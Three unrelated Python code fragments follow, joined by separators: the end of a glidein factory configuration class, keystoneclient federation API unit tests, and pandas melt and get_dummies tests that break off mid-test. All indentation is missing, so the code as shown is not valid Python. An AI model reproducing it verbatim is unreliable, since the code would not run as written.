attr_names=self.entries[entry_name].attrs.keys()
for attr_name in attr_names:
if not cWParams.is_valid_name(attr_name):
raise RuntimeError, "Invalid entry '%s' attribute name '%s'."%(entry_name,attr_name)
# return xml formatting
def get_xml_format(self):
return {
'lists_params':{
'condor_tarballs':{'el_name':'condor_tarball', 'subtypes_params':{'class':{}}},
'files':{'el_name':'file','subtypes_params':{'class':{}}},
'process_logs':{'el_name':'process_log','subtypes_params':{'class':{}}},
'monitorgroups':{'el_name':'monitorgroup','subtypes_params':{'class':{}}},
'monitoring_collectors':{'el_name':'monitoring_collector','subtypes_params':{'class':{}}},
'infosys_refs':{'el_name':'infosys_ref','subtypes_params':{'class':{}}}
},
'dicts_params':{
'attrs':{'el_name':'attr','subtypes_params':{'class':{}}},
'per_frontends':{'el_name':'per_frontend','subtypes_params':{'class':{}}},
'entries':{'el_name':'entry','subtypes_params':{'class':{}}},
'allow_frontends':{'el_name':'allow_frontend','subtypes_params':{'class':{}}},
'frontends':{'el_name':'frontend','subtypes_params':{'class':{}}},
'security_classes':{'el_name':'security_class','subtypes_params':{'class':{}}},
'submit_attrs':{'el_name':'submit_attr','subtypes_params':{'class':{}}},
}
}
############################################################
#
# P R I V A T E - Do not use
#
############################################################
#####################################
# try to find out the base condor dir
def find_condor_base_dir():
if condorExe.condor_bin_path is None:
return None
else:
return os.path.dirname(condorExe.condor_bin_path)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import uuid
from keystoneclient import access
from keystoneclient import exceptions
from keystoneclient import fixture
from keystoneclient.tests.unit.v3 import utils
from keystoneclient.v3.contrib.federation import base
from keystoneclient.v3.contrib.federation import identity_providers
from keystoneclient.v3.contrib.federation import mappings
from keystoneclient.v3.contrib.federation import protocols
from keystoneclient.v3 import domains
from keystoneclient.v3 import projects
class IdentityProviderTests(utils.TestCase, utils.CrudTests):
def setUp(self):
super(IdentityProviderTests, self).setUp()
self.key = 'identity_provider'
self.collection_key = 'identity_providers'
self.model = identity_providers.IdentityProvider
self.manager = self.client.federation.identity_providers
self.path_prefix = 'OS-FEDERATION'
def new_ref(self, **kwargs):
kwargs.setdefault('id', uuid.uuid4().hex)
kwargs.setdefault('description', uuid.uuid4().hex)
kwargs.setdefault('enabled', True)
return kwargs
def test_positional_parameters_expect_fail(self):
"""Ensure CrudManager raises TypeError exceptions.
After passing wrong number of positional arguments
an exception should be raised.
Operations to be tested:
* create()
* get()
* list()
* delete()
* update()
"""
POS_PARAM_1 = uuid.uuid4().hex
POS_PARAM_2 = uuid.uuid4().hex
POS_PARAM_3 = uuid.uuid4().hex
PARAMETERS = {
'create': (POS_PARAM_1, POS_PARAM_2),
'get': (POS_PARAM_1, POS_PARAM_2),
'list': (POS_PARAM_1, POS_PARAM_2),
'update': (POS_PARAM_1, POS_PARAM_2, POS_PARAM_3),
'delete': (POS_PARAM_1, POS_PARAM_2)
}
for f_name, args in PARAMETERS.items():
self.assertRaises(TypeError, getattr(self.manager, f_name),
*args)
def test_create(self, ref=None, req_ref=None):
ref = ref or self.new_ref()
# req_ref argument allows you to specify a different
# signature for the request when the manager does some
# conversion before doing the request (e.g. converting
# from datetime object to timestamp string)
req_ref = (req_ref or ref).copy()
req_ref.pop('id')
self.stub_entity('PUT', entity=ref, id=ref['id'], status_code=201)
returned = self.manager.create(**ref)
self.assertIsInstance(returned, self.model)
for attr in req_ref:
self.assertEqual(
getattr(returned, attr),
req_ref[attr],
'Expected different %s' % attr)
self.assertEntityRequestBodyIs(req_ref)
class MappingTests(utils.TestCase, utils.CrudTests):
def setUp(self):
super(MappingTests, self).setUp()
self.key = 'mapping'
self.collection_key = 'mappings'
self.model = mappings.Mapping
self.manager = self.client.federation.mappings
self.path_prefix = 'OS-FEDERATION'
def new_ref(self, **kwargs):
kwargs.setdefault('id', uuid.uuid4().hex)
kwargs.setdefault('rules', [uuid.uuid4().hex,
uuid.uuid4().hex])
return kwargs
def test_create(self, ref=None, req_ref=None):
ref = ref or self.new_ref()
manager_ref = ref.copy()
mapping_id = manager_ref.pop('id')
# req_ref argument allows you to specify a different
# signature for the request when the manager does some
# conversion before doing the request (e.g. converting
# from datetime object to timestamp string)
req_ref = (req_ref or ref).copy()
self.stub_entity('PUT', entity=req_ref, id=mapping_id,
status_code=201)
returned = self.manager.create(mapping_id=mapping_id, **manager_ref)
self.assertIsInstance(returned, self.model)
for attr in req_ref:
self.assertEqual(
getattr(returned, attr),
req_ref[attr],
'Expected different %s' % attr)
self.assertEntityRequestBodyIs(manager_ref)
class ProtocolTests(utils.TestCase, utils.CrudTests):
def setUp(self):
super(ProtocolTests, self).setUp()
self.key = 'protocol'
self.collection_key = 'protocols'
self.model = protocols.Protocol
self.manager = self.client.federation.protocols
self.path_prefix = 'OS-FEDERATION/identity_providers'
def _transform_to_response(self, ref):
"""Rebuild dictionary so it can be used as a
reference response body.
"""
response = copy.deepcopy(ref)
response['id'] = response.pop('protocol_id')
del response['identity_provider']
return response
def new_ref(self, **kwargs):
kwargs.setdefault('mapping', uuid.uuid4().hex)
kwargs.setdefault('identity_provider', uuid.uuid4().hex)
kwargs.setdefault('protocol_id', uuid.uuid4().hex)
return kwargs
def build_parts(self, identity_provider, protocol_id=None):
"""Build array used to construct mocking URL.
Construct and return array with URL parts later used
by methods like utils.TestCase.stub_entity().
Example of URL:
``OS-FEDERATION/identity_providers/{idp_id}/
protocols/{protocol_id}``
"""
parts = ['OS-FEDERATION', 'identity_providers',
identity_provider, 'protocols']
if protocol_id:
parts.append(protocol_id)
return parts
def test_build_url_provide_base_url(self):
base_url = uuid.uuid4().hex
parameters = {'base_url': base_url}
url = self.manager.build_url(dict_args_in_out=parameters)
self.assertEqual('/'.join([base_url, self.collection_key]), url)
def test_build_url_w_idp_id(self):
"""Test whether kwargs ``base_url`` discards object's base_url
This test shows, that when ``base_url`` is specified in the
dict_args_in_out dictionary, values like ``identity_provider_id``
are not taken into consideration while building the url.
"""
base_url, identity_provider_id = uuid.uuid4().hex, uuid.uuid4().hex
parameters = {
'base_url': base_url,
'identity_provider_id': identity_provider_id
}
url = self.manager.build_url(dict_args_in_out=parameters)
self.assertEqual('/'.join([base_url, self.collection_key]), url)
def test_build_url_default_base_url(self):
identity_provider_id = uuid.uuid4().hex
parameters = {
'identity_provider_id': identity_provider_id
}
url = self.manager.build_url(dict_args_in_out=parameters)
self.assertEqual(
'/'.join([self.manager.base_url, identity_provider_id,
self.manager.collection_key]), url)
def test_create(self):
"""Test creating federation protocol tied to an Identity Provider.
URL to be tested: PUT /OS-FEDERATION/identity_providers/
$identity_provider/protocols/$protocol
"""
request_args = self.new_ref()
expected = self._transform_to_response(request_args)
parts = self.build_parts(request_args['identity_provider'],
request_args['protocol_id'])
self.stub_entity('PUT', entity=expected,
parts=parts, status_code=201)
returned = self.manager.create(**request_args)
self.assertEqual(expected, returned.to_dict())
request_body = {'mapping_id': request_args['mapping']}
self.assertEntityRequestBodyIs(request_body)
def test_get(self):
"""Fetch federation protocol object.
URL to be tested: GET /OS-FEDERATION/identity_providers/
$identity_provider/protocols/$protocol
"""
request_args = self.new_ref()
expected = self._transform_to_response(request_args)
parts = self.build_parts(request_args['identity_provider'],
request_args['protocol_id'])
self.stub_entity('GET', entity=expected,
parts=parts, status_code=201)
returned = self.manager.get(request_args['identity_provider'],
request_args['protocol_id'])
self.assertIsInstance(returned, self.model)
self.assertEqual(expected, returned.to_dict())
def test_delete(self):
"""Delete federation protocol object.
URL to be tested: DELETE /OS-FEDERATION/identity_providers/
$identity_provider/protocols/$protocol
"""
request_args = self.new_ref()
parts = self.build_parts(request_args['identity_provider'],
request_args['protocol_id'])
self.stub_entity('DELETE', parts=parts, status_code=204)
self.manager.delete(request_args['identity_provider'],
request_args['protocol_id'])
def test_list(self):
"""Test listing all federation protocols tied to the Identity Provider.
URL to be tested: GET /OS-FEDERATION/identity_providers/
$identity_provider/protocols
"""
def _ref_protocols():
return {
'id': uuid.uuid4().hex,
'mapping_id': uuid.uuid4().hex
}
request_args = self.new_ref()
expected = [_ref_protocols() for _ in range(3)]
parts = self.build_parts(request_args['identity_provider'])
self.stub_entity('GET', parts=parts,
entity=expected, status_code=200)
returned = self.manager.list(request_args['identity_provider'])
for obj, ref_obj in zip(returned, expected):
self.assertEqual(obj.to_dict(), ref_obj)
def test_list_params(self):
request_args = self.new_ref()
filter_kwargs = {uuid.uuid4().hex: uuid.uuid4().hex}
parts = self.build_parts(request_args['identity_provider'])
# Return HTTP 401 as we don't accept such requests.
self.stub_entity('GET', parts=parts, status_code=401)
self.assertRaises(exceptions.Unauthorized,
self.manager.list,
request_args['identity_provider'],
**filter_kwargs)
self.assertQueryStringContains(**filter_kwargs)
def test_update(self):
"""Test updating federation protocol
URL to be tested: PATCH /OS-FEDERATION/identity_providers/
$identity_provider/protocols/$protocol
"""
request_args = self.new_ref()
expected = self._transform_to_response(request_args)
parts = self.build_parts(request_args['identity_provider'],
request_args['protocol_id'])
self.stub_entity('PATCH', parts=parts,
entity=expected, status_code=200)
returned = self.manager.update(request_args['identity_provider'],
request_args['protocol_id'],
mapping=request_args['mapping'])
self.assertIsInstance(returned, self.model)
self.assertEqual(expected, returned.to_dict())
request_body = {'mapping_id': request_args['mapping']}
self.assertEntityRequestBodyIs(request_body)
class EntityManagerTests(utils.TestCase):
def test_create_object_expect_fail(self):
self.assertRaises(TypeError,
base.EntityManager,
self.client)
class FederationProjectTests(utils.TestCase):
def setUp(self):
super(FederationProjectTests, self).setUp()
self.key = 'project'
self.collection_key = 'projects'
self.model = projects.Project
self.manager = self.client.federation.projects
self.URL = "%s%s" % (self.TEST_URL, '/OS-FEDERATION/projects')
def new_ref(self, **kwargs):
kwargs.setdefault('id', uuid.uuid4().hex)
kwargs.setdefault('domain_id', uuid.uuid4().hex)
kwargs.setdefault('enabled', True)
kwargs.setdefault('name', uuid.uuid4().hex)
return kwargs
def test_list_accessible_projects(self):
projects_ref = [self.new_ref(), self.new_ref()]
projects_json = {
self.collection_key: [self.new_ref(), self.new_ref()]
}
self.requests.get(self.URL, json=projects_json)
returned_list = self.manager.list()
self.assertEqual(len(projects_ref), len(returned_list))
for project in returned_list:
self.assertIsInstance(project, self.model)
class FederationDomainTests(utils.TestCase):
def setUp(self):
super(FederationDomainTests, self).setUp()
self.key = 'domain'
self.collection_key = 'domains'
self.model = domains.Domain
self.manager = self.client.federation.domains
self.URL = "%s%s" % (self.TEST_URL, '/OS-FEDERATION/domains')
def new_ref(self, **kwargs):
kwargs.setdefault('id', uuid.uuid4().hex)
kwargs.setdefault('enabled', True)
kwargs.setdefault('name', uuid.uuid4().hex)
kwargs.setdefault('description', uuid.uuid4().hex)
return kwargs
def test_list_accessible_domains(self):
domains_ref = [self.new_ref(), self.new_ref()]
domains_json = {
self.collection_key: domains_ref
}
self.requests.get(self.URL, json=domains_json)
returned_list = self.manager.list()
self.assertEqual(len(domains_ref), len(returned_list))
for domain in returned_list:
self.assertIsInstance(domain, self.model)
class FederatedTokenTests(utils.TestCase):
def setUp(self):
super(FederatedTokenTests, self).setUp()
token = fixture.V3FederationToken()
token.set_project_scope()
token.add_role()
self.federated_token = access.AccessInfo.factory(body=token)
def test_federated_property_federated_token(self):
"""Check if is_federated property returns expected value."""
self.assertTrue(self.federated_token.is_federated)
def test_get_user_domain_name(self):
"""Ensure a federated user's domain name does not exist."""
self.assertIsNone(self.federated_token.user_domain_name)
def test_get_user_domain_id(self):
"""Ensure a federated user's domain ID does not exist."""
self.assertIsNone(self.federated_token.user_domain_id)
| |
# -*- coding: utf-8 -*-
# pylint: disable-msg=W0612,E1101
import pytest
from pandas import DataFrame, Series
import pandas as pd
from numpy import nan
import numpy as np
from pandas.util.testing import assert_frame_equal
from pandas.core.reshape.reshape import (
melt, lreshape, get_dummies, wide_to_long)
import pandas.util.testing as tm
from pandas.compat import range, u
class TestMelt(object):
def setup_method(self, method):
self.df = tm.makeTimeDataFrame()[:10]
self.df['id1'] = (self.df['A'] > 0).astype(np.int64)
self.df['id2'] = (self.df['B'] > 0).astype(np.int64)
self.var_name = 'var'
self.value_name = 'val'
self.df1 = pd.DataFrame([[1.067683, -1.110463, 0.20867
], [-1.321405, 0.368915, -1.055342],
[-0.807333, 0.08298, -0.873361]])
self.df1.columns = [list('ABC'), list('abc')]
self.df1.columns.names = ['CAP', 'low']
def test_top_level_method(self):
result = melt(self.df)
assert result.columns.tolist() == ['variable', 'value']
def test_method_signatures(self):
tm.assert_frame_equal(self.df.melt(),
melt(self.df))
tm.assert_frame_equal(self.df.melt(id_vars=['id1', 'id2'],
value_vars=['A', 'B']),
melt(self.df,
id_vars=['id1', 'id2'],
value_vars=['A', 'B']))
tm.assert_frame_equal(self.df.melt(var_name=self.var_name,
value_name=self.value_name),
melt(self.df,
var_name=self.var_name,
value_name=self.value_name))
tm.assert_frame_equal(self.df1.melt(col_level=0),
melt(self.df1, col_level=0))
def test_default_col_names(self):
result = self.df.melt()
assert result.columns.tolist() == ['variable', 'value']
result1 = self.df.melt(id_vars=['id1'])
assert result1.columns.tolist() == ['id1', 'variable', 'value']
result2 = self.df.melt(id_vars=['id1', 'id2'])
assert result2.columns.tolist() == ['id1', 'id2', 'variable', 'value']
def test_value_vars(self):
result3 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A')
assert len(result3) == 10
result4 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'])
expected4 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
'variable': ['A'] * 10 + ['B'] * 10,
'value': (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', 'variable', 'value'])
tm.assert_frame_equal(result4, expected4)
def test_value_vars_types(self):
# GH 15348
expected = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
'variable': ['A'] * 10 + ['B'] * 10,
'value': (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', 'variable', 'value'])
for type_ in (tuple, list, np.array):
result = self.df.melt(id_vars=['id1', 'id2'],
value_vars=type_(('A', 'B')))
tm.assert_frame_equal(result, expected)
def test_vars_work_with_multiindex(self):
expected = DataFrame({
('A', 'a'): self.df1[('A', 'a')],
'CAP': ['B'] * len(self.df1),
'low': ['b'] * len(self.df1),
'value': self.df1[('B', 'b')],
}, columns=[('A', 'a'), 'CAP', 'low', 'value'])
result = self.df1.melt(id_vars=[('A', 'a')], value_vars=[('B', 'b')])
tm.assert_frame_equal(result, expected)
def test_tuple_vars_fail_with_multiindex(self):
# melt should fail with an informative error message if
# the columns have a MultiIndex and a tuple is passed
# for id_vars or value_vars.
tuple_a = ('A', 'a')
list_a = [tuple_a]
tuple_b = ('B', 'b')
list_b = [tuple_b]
for id_vars, value_vars in ((tuple_a, list_b), (list_a, tuple_b),
(tuple_a, tuple_b)):
with tm.assert_raises_regex(ValueError, r'MultiIndex'):
self.df1.melt(id_vars=id_vars, value_vars=value_vars)
def test_custom_var_name(self):
result5 = self.df.melt(var_name=self.var_name)
assert result5.columns.tolist() == ['var', 'value']
result6 = self.df.melt(id_vars=['id1'], var_name=self.var_name)
assert result6.columns.tolist() == ['id1', 'var', 'value']
result7 = self.df.melt(id_vars=['id1', 'id2'], var_name=self.var_name)
assert result7.columns.tolist() == ['id1', 'id2', 'var', 'value']
result8 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A',
var_name=self.var_name)
assert result8.columns.tolist() == ['id1', 'id2', 'var', 'value']
result9 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'],
var_name=self.var_name)
expected9 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
self.var_name: ['A'] * 10 + ['B'] * 10,
'value': (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', self.var_name, 'value'])
tm.assert_frame_equal(result9, expected9)
def test_custom_value_name(self):
result10 = self.df.melt(value_name=self.value_name)
assert result10.columns.tolist() == ['variable', 'val']
result11 = self.df.melt(id_vars=['id1'], value_name=self.value_name)
assert result11.columns.tolist() == ['id1', 'variable', 'val']
result12 = self.df.melt(id_vars=['id1', 'id2'],
value_name=self.value_name)
assert result12.columns.tolist() == ['id1', 'id2', 'variable', 'val']
result13 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A',
value_name=self.value_name)
assert result13.columns.tolist() == ['id1', 'id2', 'variable', 'val']
result14 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'],
value_name=self.value_name)
expected14 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
'variable': ['A'] * 10 + ['B'] * 10,
self.value_name: (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', 'variable',
self.value_name])
tm.assert_frame_equal(result14, expected14)
def test_custom_var_and_value_name(self):
result15 = self.df.melt(var_name=self.var_name,
value_name=self.value_name)
assert result15.columns.tolist() == ['var', 'val']
result16 = self.df.melt(id_vars=['id1'], var_name=self.var_name,
value_name=self.value_name)
assert result16.columns.tolist() == ['id1', 'var', 'val']
result17 = self.df.melt(id_vars=['id1', 'id2'],
var_name=self.var_name,
value_name=self.value_name)
assert result17.columns.tolist() == ['id1', 'id2', 'var', 'val']
result18 = self.df.melt(id_vars=['id1', 'id2'], value_vars='A',
var_name=self.var_name,
value_name=self.value_name)
assert result18.columns.tolist() == ['id1', 'id2', 'var', 'val']
result19 = self.df.melt(id_vars=['id1', 'id2'], value_vars=['A', 'B'],
var_name=self.var_name,
value_name=self.value_name)
expected19 = DataFrame({'id1': self.df['id1'].tolist() * 2,
'id2': self.df['id2'].tolist() * 2,
self.var_name: ['A'] * 10 + ['B'] * 10,
self.value_name: (self.df['A'].tolist() +
self.df['B'].tolist())},
columns=['id1', 'id2', self.var_name,
self.value_name])
tm.assert_frame_equal(result19, expected19)
df20 = self.df.copy()
df20.columns.name = 'foo'
result20 = df20.melt()
assert result20.columns.tolist() == ['foo', 'value']
def test_col_level(self):
res1 = self.df1.melt(col_level=0)
res2 = self.df1.melt(col_level='CAP')
assert res1.columns.tolist() == ['CAP', 'value']
assert res2.columns.tolist() == ['CAP', 'value']
def test_multiindex(self):
res = self.df1.melt()
assert res.columns.tolist() == ['CAP', 'low', 'value']
class TestGetDummies(object):
sparse = False
def setup_method(self, method):
self.df = DataFrame({'A': ['a', 'b', 'a'],
'B': ['b', 'b', 'c'],
'C': [1, 2, 3]})
def test_basic(self):
s_list = list('abc')
s_series = Series(s_list)
s_series_index = Series(s_list, list('ABC'))
expected = DataFrame({'a': {0: 1,
1: 0,
2: 0},
'b': {0: 0,
1: 1,
2: 0},
'c': {0: 0,
1: 0,
2: 1}}, dtype=np.uint8)
assert_frame_equal(get_dummies(s_list, sparse=self.sparse), expected)
assert_frame_equal(get_dummies(s_series, sparse=self.sparse), expected)
expected.index = list('ABC')
assert_frame_equal(
get_dummies(s_series_index, sparse=self.sparse), expected)
def test_basic_types(self):
# GH 10531
s_list = list('abc')
s_series = Series(s_list)
s_df = DataFrame({'a': [0, 1, 0, 1, 2],
'b': ['A', 'A', 'B', 'C', 'C'],
'c': [2, 3, 3, 3, 2]})
expected = DataFrame({'a': [1, 0, 0],
'b': [0, 1, 0],
'c': [0, 0, 1]},
dtype='uint8',
columns=list('abc'))
if not self.sparse:
compare = tm.assert_frame_equal
else:
expected = expected.to_sparse(fill_value=0, kind='integer')
compare = tm.assert_sp_frame_equal
result = get_dummies(s_list, sparse=self.sparse)
compare(result, expected)
result = get_dummies(s_series, sparse=self.sparse)
compare(result, expected)
result = get_dummies(s_df, sparse=self.sparse, columns=s_df.columns)
tm.assert_series_equal(result.get_dtype_counts(),
Series({'uint8': 8}))
result = get_dummies(s_df, sparse=self.sparse, columns=['a'])
expected = Series({'uint8': 3, 'int64': 1, 'object': 1}).sort_values()
tm.assert_series_equal(result.get_dtype_counts().sort_values(),
expected)
def test_just_na(self):
just_na_list = [np.nan]
just_na_series = Series(just_na_list)
just_na_series_index = Series(just_na_list, index=['A'])
res_list = get_dummies(just_na_list, sparse=self.sparse)
res_series = get_dummies(just_na_series, sparse=self.sparse)
res_series_index = get_dummies(just_na_series_index,
sparse=self.sparse)
assert res_list.empty
assert res_series.empty
assert res_series_index.empty
assert res_list.index.tolist() == [0]
assert res_series.index.tolist() == [0]
assert res_series_index.index.tolist() == ['A']
def test_include_na(self):
s = ['a', 'b', np.nan]
res = get_dummies(s, sparse=self.sparse)
exp = DataFrame({'a': {0: 1, 1: 0, 2: 0},
'b': {0: 0, 1: 1, 2: 0}}, dtype=np.uint8)
assert_frame_equal(res, exp)
# Sparse dataframes do not allow nan labelled columns, see #GH8822
res_na = get_dummies(s, dummy_na=True, sparse=self.sparse)
exp_na = DataFrame({nan: {0: 0, 1: 0, 2: 1},
'a': {0: 1, 1: 0, 2: 0},
'b': {0: 0, 1: 1, 2: 0}},
dtype=np.uint8)
exp_na = exp_na.reindex_axis(['a', 'b', nan], 1)
# hack (NaN handling in assert_index_equal)
exp_na.columns = res_na.columns
assert_frame_equal(res_na, exp_na)
res_just_na = get_dummies([nan], dummy_na=True, sparse=self.sparse)
exp_just_na = DataFrame(Series(1, index=[0]), columns=[nan],
dtype=np.uint8)
tm.assert_numpy_array_equal(res_just_na.values, exp_just_na.values)
def test_unicode(self
): # See GH 6885 - get_dummies chokes on unicode values
import unicodedata
e = 'e'
eacute = unicodedata.lookup('LATIN SMALL LETTER E WITH ACUTE')
s = [e, eacute, eacute]
res = get_dummies(s, prefix='letter', sparse=self.sparse)
exp = DataFrame({'letter_e': {0: 1,
1: 0,
2: 0},
u('letter_%s') % eacute: {0: 0,
1: 1,
2: 1}},
dtype=np.uint8)
assert_frame_equal(res, exp)
def test_dataframe_dummies_all_obj(self):
df = self.df[['A', 'B']]
result = get_dummies(df, sparse=self.sparse)
expected = DataFrame({'A_a': [1, 0, 1],
'A_b': [0, 1, 0],
'B_b': [1, 1, 0],
'B_c': [0, 0, 1]}, dtype=np.uint8)
assert_frame_equal(result, expected)
def test_dataframe_dummies_mix_default(self):
df = self.df
result = get_dummies(df, sparse=self.sparse)
expected = DataFrame({'C': [1, 2, 3],
'A_a': [1, 0, 1],
'A_b': [0, 1, 0],
'B_b': [1, 1, 0],
'B_c': [0, 0, 1]})
cols = ['A_a', 'A_b', 'B_b', 'B_c']
expected[cols] = expected[cols].astype(np.uint8)
expected = expected[['C', 'A_a', 'A_b', 'B_b', 'B_c']]
assert_frame_equal(result, expected)
def test_dataframe_dummies_prefix_list(self):
prefixes = ['from_A', 'from_B']
df = DataFrame({'A': ['a', 'b', 'a'],
'B': ['b', 'b', 'c'],
'C': [1, 2, 3]})
result = get_dummies(df, prefix=prefixes, sparse=self.sparse)
expected = DataFrame({'C': [1, 2, 3],
'from_A_a': [1, 0, 1],
'from_A_b': [0, 1, 0],
'from_B_b': [1, 1, 0],
'from_B_c': [0, 0, 1]})
cols = expected.columns[1:]
expected[cols] = expected[cols].astype(np.uint8)
expected = expected[['C', 'from_A_a', 'from_A_b', 'from_B_b',
'from_B_c']]
assert_frame_equal(result, expected)
def test_dataframe_dummies_prefix_str(self):
# not that you should do this...
df = self.df
result = get_dummies(df, prefix='bad', sparse=self.sparse)
expected = DataFrame([[1, 1, 0, 1, 0],
[2, 0, 1, 1, 0],
[3, 1, 0, 0, 1]],
columns=['C', 'bad_a', 'bad_b', 'bad_b', 'bad_c'],
dtype=np.uint8)
expected = expected.astype({"C": np.int64})
assert_frame_equal(result, expected)
def test_dataframe_dummies_subset(self):
df = self.df
result = get_dummies(df, prefix=['from_A'], columns=['A'],
sparse=self.sparse)
expected = DataFrame({'from_A_a': [1, 0, 1],
'from_A_b': [0, 1, 0],
'B': ['b', 'b', 'c'],
'C': [1, 2, 3]})
cols = ['from_A_a', 'from_A_b']
expected[cols] = expected[cols].astype(np.uint8)
assert_frame_equal(result, expected)
def test_dataframe_dummies_prefix_sep(self):
df = self.df
result = get_dummies(df, prefix_sep='..', sparse=self.sparse)
expected = DataFrame({'C': [1, 2, 3],
'A..a': [1, 0, 1],
'A..b': [0, 1, 0],
'B..b': [1, 1, 0],
'B..c': [0, 0, 1]})
expected = expected[['C', 'A..a', 'A..b', 'B..b', 'B..c']]
cols = expected.columns[1:]
expected[cols] = expected[cols].astype(np.uint8)
assert_frame_equal(result, expected)
result = get_dummies(df, prefix_sep=['..', '__'], sparse=self.sparse)
expected = expected.rename(columns={'B..b': 'B__b', 'B..c': 'B__c'})
assert_frame_equal(result, expected)
result = get_dummies(df, prefix_sep={'A': '..',
'B': '__'}, sparse=self.sparse)
assert_frame_equal(result, expected)
def test_dataframe_dummies_prefix_bad_length(self):
with pytest.raises(ValueError):
get_dummies(self.df, prefix=['too few'], sparse=self.sparse)
def test_dataframe_dummies_prefix_sep_bad_length(self):
with pytest.raises(ValueError):
get_dummies(self.df, prefix_sep=['bad'], sparse=self.sparse)
def test_dataframe_dummies_prefix_dict(self):
prefixes = {'A': 'from_A', 'B': 'from_B'}
df = DataFrame({'A': ['a', 'b', 'a'],
'B': ['b', 'b', 'c'],
'C': [1, 2, 3]})
result = get_dummies(df, prefix=prefixes, sparse=self.sparse)
expected = DataFrame({'from_A_a': [1, 0, 1],
'from_A_b': [0, 1, 0],
'from_B_b': [1, 1, 0],
'from_B_c': [0, 0, 1],
'C': [1, 2, 3]})
cols = ['from_A_a', 'from_A_b', 'from_B_b', 'from_B_c']
expected[cols] = expected[cols].astype(np.uint8)
assert_frame_equal(result, expected)
def test_dataframe_dummies_with_na(self):
df = self.df
df.loc[3, :] = [np.nan, np.nan, np.nan]
result = get_dummies(df, dummy_na=True, sparse=self.sparse)
expected = DataFrame({'C': [1, 2, 3, np.nan],
'A_a': [1, 0, 1, 0],
'A_b': [0, 1, 0, 0],
'A_nan': [0, 0, 0, 1],
'B_b': [1, 1, 0, 0],
'B_c': [0, 0, 1, 0],
'B_nan': [0, 0, 0, 1]})
cols = ['A_a', 'A_b', 'A_nan', 'B_b', 'B_c', 'B_nan']
expected[cols] = expected[cols].astype(np.uint8)
expected = expected[['C', 'A_a', 'A_b', 'A_nan',
'B_b', 'B_c', 'B_nan']]
assert_frame_equal(result, expected)
result = get_dummies(df, dummy_na=False, sparse=self.sparse)
expected = expected[['C', 'A_a', 'A_b', 'B_b', 'B_c']]
assert_frame_equal(result, expected)
def test_dataframe_dummies_with_categorical(self):
df = self.df
df['cat'] = pd.Categorical(['x', 'y', 'y'])
result = get_dummies(df, sparse=self.sparse)
expected = DataFrame({'C': [1, 2, 3],
'A_a': [1, 0, 1],
'A_b': [0, 1, 0],
'B_b': [1, 1, 0],
'B_c': [0, 0, 1],
'cat_x': [1, 0, 0],
'cat_y': [0, 1, 1]})
cols = ['A_a', 'A_b', 'B_b', 'B_c', 'cat_x', 'cat_y']
expected[cols] = expected[cols].astype(np.uint8)
expected = expected[['C', 'A_a', 'A_b', 'B_b', 'B_c',
'cat_x', 'cat_y']]
assert_frame_equal(result, expected)
def test_basic_drop_first(self):
# GH12402 Add a new parameter `drop_first` to avoid collinearity
# Basic case
s_list = list('abc')
s_series = Series(s_list)
s_series_index = Series(s_list, list('ABC'))
expected = DataFrame({'b': {0: 0,
1: 1,
2: 0},
'c': {0: 0,
1: 0,
2: 1}}, dtype=np.uint8)
result = get_dummies(s_list, sparse=self.sparse, drop_first=True)
assert_frame_equal(result, expected)
result = get_dummies(s_series, sparse=self.sparse, drop_first=True)
assert_frame_equal(result, expected)
expected.index = list('ABC')
result = get_dummies(s_series_index, sparse=self.sparse,
drop_first=True)
assert_frame_equal(result, expected)
def test_basic_drop_first_one_level(self):
# Test the case that categorical variable only has one level.
s_list = list('aaa')
s_series = Series(s_list)
s_series_index = Series(s_list, list('ABC'))
expected = DataFrame(index=np.arange(3))
result = get_dummies(s_list, sparse=self.sparse, drop_first=True)
assert_frame_equal(result, expected)
result = get_dummies(s_series, sparse=self.sparse, drop_first=True)
assert_frame_equal(result, expected)
expected = DataFrame(index=list('ABC'))
result = get_dummies(s_series_index, sparse=self.sparse,
drop_first=True)
assert_frame_equal(result, expected)
def test_basic_drop_first_NA(self):
# Test NA hadling together with drop_first
s_NA = ['a', 'b', np.nan]
res = get_dummies(s_NA, sparse=self.sparse, drop_first=True)
exp = DataFrame({'b': {0: 0,
1: 1,
2: 0}}, dtype=np.uint8)
assert_frame_equal(res, exp)
res_na = get_dummies(s_NA, dummy_na=True, sparse=self.sparse,
drop_first=True)
exp_na = DataFrame({'b': {0: 0,
1: 1,
2: 0},
nan: {0: 0,
1: 0,
2: 1}}, dtype=np.uint8).reindex_axis(
['b', nan], 1)
assert_frame_equal(res_na, exp_na)
res_just_na = get_dummies([nan], dummy_na=True, sparse=self.sparse,
drop_first=True)
exp_just_na = DataFrame(index=np.arange(1))
assert_frame_equal(res_just_na, exp_just_na)
def test_dataframe_dummies_drop_first(self):
df = self.df[['A', 'B']]
result = get_dummies(df, sparse=self.sparse, drop_first=True)
expected = DataFrame({'A_b': [0, 1, 0],
'B_c': [0, 0, 1]}, dtype=np.uint8)
assert_frame_equal(result, expected)
def test_dataframe_dummies_drop_first_with_categorical(self):
df = self.df
df['cat'] = pd.Categorical(['x', 'y', 'y'])
result = get_dummies(df, sparse=self.sparse, drop_first=True)
expected = DataFrame({'C': [1, 2, 3],
'A_b': [0, 1, 0],
'B_c': [0, 0, 1],
